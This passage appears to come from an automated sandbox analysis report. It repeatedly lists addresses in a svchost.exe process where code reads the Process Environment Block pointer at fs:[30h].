Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]	2_2_034BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]	2_2_034B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]	2_2_03438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]	2_2_0346C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]	2_2_03430710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]	2_2_03460710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]	2_2_034AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]	2_2_034B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_034BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]	2_2_034D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]	2_2_034307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]	2_2_034E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]	2_2_0344C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]	2_2_03462674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]	2_2_034AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]	2_2_03472619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]	2_2_0344E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]	2_2_03466620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]	2_2_03468620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]	2_2_0343262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0346C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]	2_2_034666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]	2_2_034C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]	2_2_034365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]	2_2_034325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]	2_2_03464588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]	2_2_0346E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]	2_2_0342645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]	2_2_0345245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]	2_2_034BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]	2_2_0342C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]	2_2_0346A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]	2_2_034304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]	2_2_034364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]	2_2_034644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_034BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]	2_2_034D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]	2_2_034DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]	2_2_0342CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_034DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]	2_2_0345EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_034BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]	2_2_034DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]	2_2_034BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]	2_2_0346CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]	2_2_0345EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]	2_2_0346CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]	2_2_03430AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
